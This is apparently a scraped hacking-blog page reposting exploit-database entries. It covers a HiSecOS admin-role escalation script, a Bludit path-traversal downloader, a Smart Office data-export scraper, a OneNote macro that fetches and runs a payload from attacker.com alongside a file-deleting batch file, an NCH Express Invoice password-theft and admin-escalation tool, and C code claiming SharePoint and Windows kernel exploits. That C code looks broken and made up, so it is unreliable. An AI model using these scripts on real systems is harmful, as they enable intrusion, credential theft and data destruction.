    # Exploit Title: HiSecOS 04.0.01 - Privilege Escalation # Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation # Date: 21.06.2023 # Exploit Author: dreizehnutters # Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016 # Version: HiSecOS-04.0.01 or lower # Tested on: HiSecOS-04.0.01 # CVE: BSECV-2021-07 #!/bin/bash if [[ $# -lt 3 ]]; then echo "Usage: $0 <IP> <USERNAME> <PASSWORD>" exit 1 fi target="$1" user="$2" pass="$3" # Craft basic header auth=$(echo -ne "$user:$pass" | base64) # Convert to ASCII hex blob=$(printf "$user" | xxd -ps -c 1) # Generate XML payload ('15' -> admin role) gen_payload() { cat <<EOF <rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20"> <mibOperation xmlns="urn:x-mops:1.0"> <edit-config> <MIBData> <MIB name="HM2-USERMGMT-MIB"> <Node name="hm2UserConfigEntry"> <Index> <Attribute name="hm2UserName">$blob</Attribute> </Index> <Set name="hm2UserAccessRole">15</Set> </Node> </MIB> </MIBData> </edit-config> </mibOperation> </rpc> EOF } curl -i -s -k -X POST \ -H "content-type: application/xml" \ -H "authorization: Basic ${auth}" \ --data-binary "$(gen_payload)" \ "https://${target}/mops_data" echo "[*] $user is now an admin"
  19. HireHackking

    Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # -*- coding: utf-8 -*- #/usr/bin/env python # Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated) # Date: 2022-07-21 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://www.bludit.com # Software Link: https://github.com/bludit/bludit # Version: < 3.13.1 # Tested on: Debian 10 - PHP Version: 7.3.14 import requests import argparse from bs4 import BeautifulSoup #pip3 install beautifulsoup4 def main(): parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)') parser.add_argument('-x', '--url', type=str, required=True) parser.add_argument('-u', '--user', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) parser.add_argument('-f', '--file', type=str, required=True) args = parser.parse_args() print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") exploit(args) def exploit(args): s2 = requests.Session() url = args.url.rstrip("/") #get csrf token r = s2.get(url+'/admin/') soup = BeautifulSoup(r.text, 'html.parser') formtoken = soup.find('input', {'name':'tokenCSRF'})['value'] #login body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password} r = s2.post(url+'/admin/', data=body, allow_redirects=False) if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1): print("[*] Login OK") else: print("[*] Login Failed") exit(1) #arbitrary download r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file) if(r.status_code==200 and len(r.content)>0): print("[*] File:") print(r.text) else: print("[*] Exploit Failed") exit(1) if __name__ == '__main__': main()
  20. HireHackking

    Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) # Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office" # Date: 09/Dec/2022 # Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/) # Vendor Homepage: https://smartofficepayroll.com/ # Software Link: https://smartofficepayroll.com/downloads # Version: Smart Office Web 20.28 and before # CVE Number : CVE-2022-47075 and CVE-2022-47076 # CVSS : 7.5 (High) # Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/ # Vulnerability Description: # Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails. import wget import os from colorama import Fore, Style def download_file(url, filename): wget.download(url, filename) # Disclaimer print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.") print("The author takes no responsibility for any unauthorized usage.") print("Please use this script responsibly and adhere to the legal and ethical guidelines.") agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ") if agree != "1": print("You have chosen not to agree. Exiting the script.") exit() # Print name in red name = "Exploit by Tejas Nitin Pingulkar" print(Fore.RED + name) print(Style.RESET_ALL) # Reset color website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ") target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ") folder_name = input("Enter the folder name to save the files: ") # Create the folder if it doesn't exist if not os.path.exists(folder_name): os.makedirs(folder_name) urls_filenames = [] if target_version == "1": urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv")) else: urls_filenames.extend([ (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"), (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"), (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"), (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv") ]) print("CVE-2022-47076: Obtain user ID and password from downloaded source") for url, filename in urls_filenames: download_file(url, os.path.join(folder_name, filename)) # Print "for more such interesting exploits, visit cvewalkthrough.com" in red print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com") print(Style.RESET_ALL) # Reset color
  21. HireHackking

    Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing

    HireHackking posted a blog entry in Hacker Technology
    ## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing ## Author: nu11secur1ty ## Date: 06.22.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app ## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected ## Description: Microsoft OneNote is vulnerable to spoofing attacks. The malicious user can trick the victim into clicking on a very maliciously crafted URL or download some other malicious file and execute it. When this happens the game will be over for the victim and his computer will be compromised. Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click on a specially crafted URL to be compromised by the attacker. STATUS: HIGH Vulnerability [+]Exploit: ```vbs Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus) End Sub ``` [+]Inside-exploit ``` @echo off del /s /q C:%HOMEPATH%\IMPORTANT\* ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html) ## Time spend: 01:15:00 --
  22. HireHackking

    NCH Express Invoice - Clear Text Password Storage and Account Takeover

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: NCH Express Invoice - Clear Text Password Storage and Account Takeover # Google Dork:: intitle:ExpressInvoice - Login # Date: 07/Apr/2020 # Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/) # Vendor Homepage: https://www.nchsoftware.com/ # Software Link: http://www.oldversiondownload.com/oldversions/express-8-05-2020-06-08.exe # Version: NCH Express Invoice 8.24 and before # CVE Number : CVE-2020-11560 # CVSS: 7.8 (High) # Reference: https://cvewalkthrough.com/cve-2020-11560/ # Vulnerability Description: # Express Invoice is a thick client application that has functionality to allow the application access over the web. While configuring web access function application ask for user details such as username, password, email, etc. Application stores this information in “C:\ProgramData\NCH Software\ExpressInvoice\Accounts” in clear text as well as due to inadequate folder pemtion any Low prevladge authenticated user can access files stored in cleartext format #Note: from version 8.24 path changed to “C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts” import os import urllib.parse # Enable ANSI escape sequences for colors on Windows if os.name == 'nt': os.system('') # Function to decode URL encoding def decode_url(url): decoded_url = urllib.parse.unquote(url) return decoded_url # Function to list files and display as numeric list def list_files(file_list): for i, file in enumerate(file_list, start=1): # Omit the part of the file name after %40 username = file.split("%40")[0] print(f"{i}. {username}") # Main program print("\033[93mDisclaimer: This script is for educational purposes only.") print("The author takes no responsibility for any unauthorized usage.") print("Please use this script responsibly and adhere to the legal and ethical guidelines.\033[0m") agreement = input("\033[93mDo you agree to the terms? (yes=1, no=0): \033[0m") if agreement != '1': print("\033[93mYou did not agree to the terms. Exiting the program.\033[0m") exit() nch_version = input("\033[93mIs the targeted NCH Express Invoice application version less than 8.24? (yes=1, no=0): \033[0m") if nch_version == '1': file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts" else: file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\Accounts" file_list = os.listdir(file_directory) print("\033[94mUser Accounts:\033[0m") list_files(file_list) selected_file = input("\033[94mSelect the file number for the user: \033[0m") selected_file = int(selected_file) - 1 file_path = os.path.join(file_directory, file_list[selected_file]) with open(file_path, 'r') as file: contents = file.read() print(f"\033[94mSelected User: {file_list[selected_file].split('%40')[0]}\033[0m") exploit_option = input("\n\033[94mSelect the exploit option: " "\n1. Display User Passwords " "\n2. Account Takeover Using Password Replace " "\n3. User Privilege Escalation\nOption: \033[0m") # Exploit actions if exploit_option == "1": decoded_contents = decode_url(contents) print("\033[91mPlease find the password in the below string:\033[0m") print(decoded_contents) elif exploit_option == "2": new_password = input("\033[92mEnter the new password: \033[0m") current_password = contents.split("Password=")[1].split("&")[0] replaced_contents = contents.replace(f"Password={current_password}", f"Password={new_password}") print("\033[92mSelected user's password changed to: Your password\033[0m") print(replaced_contents) with open(file_path, 'w') as file: file.write(replaced_contents) elif exploit_option == "3": replaced_contents = contents.replace("Administrator=0", "Administrator=1").replace("Priviligies=2", "Priviligies=1") print("\033[92mUser is now an Administrator.\033[0m") print(replaced_contents) with open(file_path, 'w') as file: file.write(replaced_contents) else: print("\033[91mInvalid exploit option. Exiting the program.\033[0m") exit() print("\033[91mFor more such interesting exploits, visit cvewalkthrough.com\033[0m") input("\033[91mPress enter to exit.\033[0m")
  23. HireHackking

    Microsoft SharePoint Enterprise Server 2016 - Spoofing

    HireHackking posted a blog entry in Hacker Technology
    // Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing // Date: 2023-06-20 // country: Iran // Exploit Author: Amirhossein Bahramizadeh // Category : Remote // Vendor Homepage: // Microsoft SharePoint Foundation 2013 Service Pack 1 // Microsoft SharePoint Server Subscription Edition // Microsoft SharePoint Enterprise Server 2013 Service Pack 1 // Microsoft SharePoint Server 2019 // Microsoft SharePoint Enterprise Server 2016 // Tested on: Windows/Linux // CVE : CVE-2023-28288 #include <windows.h> #include <stdio.h> // The vulnerable SharePoint server URL const char *server_url = "http://example.com/"; // The URL of the fake SharePoint server const char *fake_url = "http://attacker.com/"; // The vulnerable SharePoint server file name const char *file_name = "vuln_file.aspx"; // The fake SharePoint server file name const char *fake_file_name = "fake_file.aspx"; int main() { HANDLE file; DWORD bytes_written; char file_contents[1024]; // Create the fake file contents sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>"); // Write the fake file to disk file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file == INVALID_HANDLE_VALUE) { printf("Error creating fake file: %d\n", GetLastError()); return 1; } if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL)) { printf("Error writing fake file: %d\n", GetLastError()); CloseHandle(file); return 1; } CloseHandle(file); // Send a request to the vulnerable SharePoint server to download the file sprintf(file_contents, "%s%s", server_url, file_name); file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (file == INVALID_HANDLE_VALUE) { printf("Error creating vulnerable file: %d\n", GetLastError()); return 1; } if (!InternetReadFileUrl(file_contents, file)) { printf("Error downloading vulnerable file: %d\n", GetLastError()); CloseHandle(file); return 1; } CloseHandle(file); // Replace the vulnerable file with the fake file if (!DeleteFile(file_name)) { printf("Error deleting vulnerable file: %d\n", GetLastError()); return 1; } if (!MoveFile(fake_file_name, file_name)) { printf("Error replacing vulnerable file: %d\n", GetLastError()); return 1; } // Send a request to the vulnerable SharePoint server to trigger the vulnerability sprintf(file_contents, "%s%s", server_url, file_name); if (!InternetReadFileUrl(file_contents, NULL)) { printf("Error triggering vulnerability: %d\n", GetLastError()); return 1; } // Print a message indicating that the vulnerability has been exploited printf("Vulnerability exploited successfully.\n"); return 0; } BOOL InternetReadFileUrl(const char *url, HANDLE file) { HINTERNET internet, connection, request; DWORD bytes_read; char buffer[1024]; // Open an Internet connection internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); if (internet == NULL) { return FALSE; } // Connect to the server connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); if (connection == NULL) { InternetCloseHandle(internet); return FALSE; } // Send the HTTP request request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0); if (request == NULL) { InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } if (!HttpSendRequest(request, NULL, 0, NULL, 0)) { InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } // Read the response data while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0) { if (file != NULL) { // Write the data to disk if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL)) { InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return FALSE; } } } InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(internet); return TRUE; }
  24. HireHackking

    Windows 11 22h2 - Kernel Privilege Elevation

    HireHackking posted a blog entry in Hacker Technology
    // Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation // Date: 2023-06-20 // country: Iran // Exploit Author: Amirhossein Bahramizadeh // Category : webapps // Vendor Homepage: // Tested on: Windows/Linux // CVE : CVE-2023-28293 #include <windows.h> #include <stdio.h> // The vulnerable driver file name const char *driver_name = "vuln_driver.sys"; // The vulnerable driver device name const char *device_name = "\\\\.\\VulnDriver"; // The IOCTL code to trigger the vulnerability #define IOCTL_VULN_CODE 0x222003 // The buffer size for the IOCTL input/output data #define IOCTL_BUFFER_SIZE 0x1000 int main() { HANDLE device; DWORD bytes_returned; char input_buffer[IOCTL_BUFFER_SIZE]; char output_buffer[IOCTL_BUFFER_SIZE]; // Load the vulnerable driver if (!LoadDriver(driver_name, "\\Driver\\VulnDriver")) { printf("Error loading vulnerable driver: %d\n", GetLastError()); return 1; } // Open the vulnerable driver device device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (device == INVALID_HANDLE_VALUE) { printf("Error opening vulnerable driver device: %d\n", GetLastError()); return 1; } // Fill the input buffer with data to trigger the vulnerability memset(input_buffer, 'A', IOCTL_BUFFER_SIZE); // Send the IOCTL to trigger the vulnerability if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL)) { printf("Error sending IOCTL: %d\n", GetLastError()); return 1; } // Print the output buffer contents printf("Output buffer:\n%s\n", output_buffer); // Unload the vulnerable driver if (!UnloadDriver("\\Driver\\VulnDriver")) { printf("Error unloading vulnerable driver: %d\n", GetLastError()); return 1; } // Close the vulnerable driver device CloseHandle(device); return 0; } BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name) { SC_HANDLE sc_manager, service; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Create the service service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL); if (service == NULL) { error = GetLastError(); if (error == ERROR_SERVICE_EXISTS) { // The service already exists, so open it instead service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } } else { CloseServiceHandle(sc_manager); return FALSE; } } // Start the service if (!StartService(service, 0, NULL)) { error = GetLastError(); if (error != ERROR_SERVICE_ALREADY_RUNNING) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE; } BOOL UnloadDriver(LPCTSTR service_name) { SC_HANDLE sc_manager, service; SERVICE_STATUS status; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Open the service service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } // Stop the service if (!ControlService(service, SERVICE_CONTROL_STOP, &status)) { error = GetLastError(); if (error != ERROR_SERVICE_NOT_ACTIVE) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } // Delete the service if (!DeleteService(service)) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE; }
  25. HireHackking

    MCL-Net 4.3.5.8788 - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure # Date: 5/31/2023 # Exploit Author: Victor A. Morales, GM Sectec Inc. # Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php # Version: 4.3.5.8788 (other versions may be affected) # Tested on: Microsoft Windows 10 Pro # CVE: CVE-2023-34834 Description: Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint. Steps to reproduce: 1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory. 2. Browse to the "/file" directory and database entry folders configured 3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.